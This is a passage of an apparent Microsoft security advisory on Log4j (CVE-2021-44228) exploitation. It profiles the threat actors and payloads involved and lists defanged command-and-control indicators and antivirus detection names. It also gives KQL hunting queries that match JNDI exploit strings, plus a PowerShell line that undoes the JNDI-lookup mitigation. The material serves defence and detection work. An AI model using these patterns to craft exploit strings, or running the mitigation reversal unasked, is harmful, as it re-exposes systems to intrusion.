compromises with the intent of lateral movement. 
Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. 
We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanning by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JNDI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44228 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. 
In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. The attackers\u2019 intent in using this malware is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. 
These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend that affected customers apply the security updates released by SolarWinds, as described in the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. 
In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many suppliers\u2019 products challenges defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementary capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. 
The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. 
Threat and Vulnerability recommendation \u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** > **Dashboard** > **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. 
These new capabilities provide security teams with the following:

 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.

To use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.

_Figure 6. Viewing each device’s mitigation status_

 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.

The mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):

You can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.

_Figure 7. Creating mitigation actions for exposed devices._

In cases where the mitigation needs to be reverted, follow these steps:

 1. Open an elevated PowerShell window
 2. Run the following command:

    [Environment]::SetEnvironmentVariable("LOG4J_FORMAT_MSG_NO_LOOKUPS", $null, [EnvironmentVariableTarget]::Machine)

The change will take effect after the device restarts.

### Microsoft 365 Defender advanced hunting

Advanced hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component.
Triage the results to determine applications and programs that may need to be patched and updated.

    DeviceTvmSoftwareInventory
    | where SoftwareName contains "log4j"
    | project DeviceName, SoftwareName, SoftwareVersion

_Figure 8. Finding vulnerable software via advanced hunting_

### Microsoft Defender for Cloud

#### Microsoft Defender for servers

Organizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there’s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:

 * Vulnerability assessment findings – Organizations that have enabled any of the vulnerability assessment tools (whether it's Microsoft Defender for Endpoint's [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)) can search by CVE identifier:

_Figure 9. Searching vulnerability assessment findings by CVE identifier_

 * Software inventory – With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:

_Figure 10. Searching software inventory by installed applications_

Note that this doesn’t replace a search of your codebase.
It’s possible that software with integrated Log4j libraries won’t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).

#### Microsoft Defender for Containers

Microsoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>).

Log4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting).

We will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.

**Finding affected images**

To find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal.
Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs.

_Figure 11. Finding images with the CVE-2021-45046 vulnerability_

**Find vulnerable running images on Azure portal [preview]**

To view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs:

_Figure 12. Finding running images with the CVE-2021-45046 vulnerability_

Note: This recommendation requires clusters to run the Microsoft Defender security profile to provide visibility on running images.

**Search Azure Resource Graph data**

Azure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.

The following query finds resources affected by the Log4j vulnerability across subscriptions.
Use the additional data field across all returned results to obtain details on vulnerable resources:

    securityresources
    | where type =~ "microsoft.security/assessments/subassessments"
    | extend assessmentKey = extract(@"(?i)providers/Microsoft.Security/assessments/([^/]*)", 1, id), subAssessmentId = tostring(properties.id), parentResourceId = extract("(.+)/providers/Microsoft.Security", 1, id)
    | extend Props = parse_json(properties)
    | extend additionalData = Props.additionalData
    | extend cves = additionalData.cve
    | where isnotempty(cves) and array_length(cves) > 0
    | mv-expand cves
    | where tostring(cves) has "CVE-2021-44228" or tostring(cves) has "CVE-2021-45046" or tostring(cves) has "CVE-2021-45105"

### Microsoft Sentinel queries

Microsoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:

 * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)

This query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>

### RiskIQ EASM and Threat Intelligence

RiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet.
For example, it's possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you.

For a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note that you must be registered with a corporate email address, and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab.

## Detecting and responding to exploitation attempts and other related attacker activity

### Microsoft 365 Defender

Microsoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.

_Figure 13. Microsoft 365 Defender solutions protect against related threats_

Customers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in “Log4j” to search for in-portal resources, check if their network is affected, and work on corresponding actionable items to mitigate them.

#### Microsoft Defender Antivirus

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.
Microsoft Defender Antivirus detects components and behaviors related to this threat under the following detection names:

On Windows:

 * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>) - detects attempted exploitation on the attacker machine
 * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine
 * [VirTool:Win64/CobaltStrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders
 * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner
 * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell
 * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation
 * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation
 * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download Cobalt Strike Beacon payload

On Linux:

 * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection
 * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner
 * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader
 * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor
 * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor
 * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation
 * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)
 * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)
 * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation Kinsing cryptocurrency miner
 * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS
 * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads
 * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation
 * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner

#### Microsoft Defender for Endpoint

Users of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.

 * Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Because of the broad range of network vectors through which this vulnerability can be exploited, and because applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post-exploitation activity such as coin mining, lateral movement, and Cobalt Strike is detected with behavior-based detections.

Alerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated.
These alerts are supported on both Windows and Linux platforms:

 * **Log4j exploitation detected** – detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability
 * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) – detects coin miners, shells, backdoors, and payloads such as Cobalt Strike used by attackers post-exploitation
 * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) – detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity

The following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don’t necessarily indicate successful exploitation:

 * **Possible target of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _received by_ this device
 * **Possible target of Log4j vulnerability scanning** – detects a possible _attempt to scan_ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device
 * **Possible source of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _initiated from_ this device
 * **Possible Log4j exploitation** – detects multiple behaviors, including suspicious command launch post-exploitation
 * **Possible Log4j exploitation (CVE-2021-44228)** – inactive; initially covered several of the above, now replaced with more specific titles

The following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j
vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:

 * Suspicious remote PowerShell execution
 * Download of file associated with digital currency mining
 * Process associated with digital currency mining
 * Cobalt Strike command and control detected
 * Suspicious network traffic connection to C2 Server
 * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)

Some of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.

_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_

#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)

Microsoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:

 * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))

_Figure 15. Microsoft 365 Defender alert "Exploitation attempt against Log4j (CVE-2021-44228)"_

#### Microsoft Defender for Office 365

To add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the “jndi” string in email headers or the sender email address field), which are moved to the Junk folder.

We also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:

 * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt – Email Headers (CVE-2021-44228))

_Figure 16. Sample alert on malicious sender display name found in email correspondence_

This detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.

_Figure 17. Sample email with malicious sender display name_

In addition, this email event can also be surfaced via advanced hunting:

_Figure 18. Sample email event surfaced via advanced hunting_

#### Microsoft 365 Defender advanced hunting queries

To locate possible exploitation activity, run the following queries:

**Possible malicious indicators in cloud application events**

This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts; however, the results can be useful to identify attackers’ details such as IP address, payload string, download URL, etc.

    CloudAppEvents
    | where Timestamp > datetime("2021-12-09")
    | where UserAgent contains "jndi:"
        or AccountDisplayName contains "jndi:"
        or Application contains "jndi:"
        or AdditionalFields contains "jndi:"
    | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields

**Alerts related to Log4j vulnerability**

This query looks for alert activity pertaining to the Log4j vulnerability.

    AlertInfo
    | where Title in~('Suspicious script launched',
    'Exploitation attempt against Log4j (CVE-2021-44228)',
    'Suspicious process executed by a network service',
    'Possible target of Log4j exploitation (CVE-2021-44228)',
    'Possible target of Log4j exploitation',
    'Possible Log4j exploitation',
    'Network connection seen in CVE-2021-44228 exploitation',
    'Log4j exploitation detected',
    'Possible exploitation of CVE-2021-44228',
    'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
    'Possible source of Log4j exploitation',
    'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
    'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
    )

**Devices with Log4j vulnerability alerts and additional alert-related context**

This query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device.

    // Get any devices with Log4J related Alert Activity
    let DevicesLog4JAlerts = AlertInfo
    | where Title in~('Suspicious script launched',
    'Exploitation attempt against Log4j (CVE-2021-44228)',
    'Suspicious process executed by a network service',
    'Possible target of Log4j exploitation (CVE-2021-44228)',
    'Possible target of Log4j exploitation',
    'Possible Log4j exploitation',
    'Network connection seen in CVE-2021-44228 exploitation',
    'Log4j exploitation detected',
    'Possible exploitation of CVE-2021-44228',
    'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
    'Possible source of Log4j exploitation', // comma was missing here in the original query
    'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
    'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
    )
    // Join in evidence information
    | join AlertEvidence on AlertId
    | where DeviceId != ""
    | summarize by DeviceId, Title;
    // Get additional alert activity for each device
    AlertEvidence
    | where DeviceId in(DevicesLog4JAlerts)
    // Add additional info
    | join kind=leftouter AlertInfo on AlertId
    | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)

**Suspected exploitation of Log4j vulnerability**

This query looks for exploitation of the vulnerability using known parameters in the malicious string.
It surfaces exploitation but may surface legitimate behavior in some environments.

    DeviceProcessEvents
    | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
    // Removing FPs
    | where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))

**Regex to identify malicious exploit string**

This query looks for the malicious string needed to exploit this vulnerability.

    DeviceProcessEvents
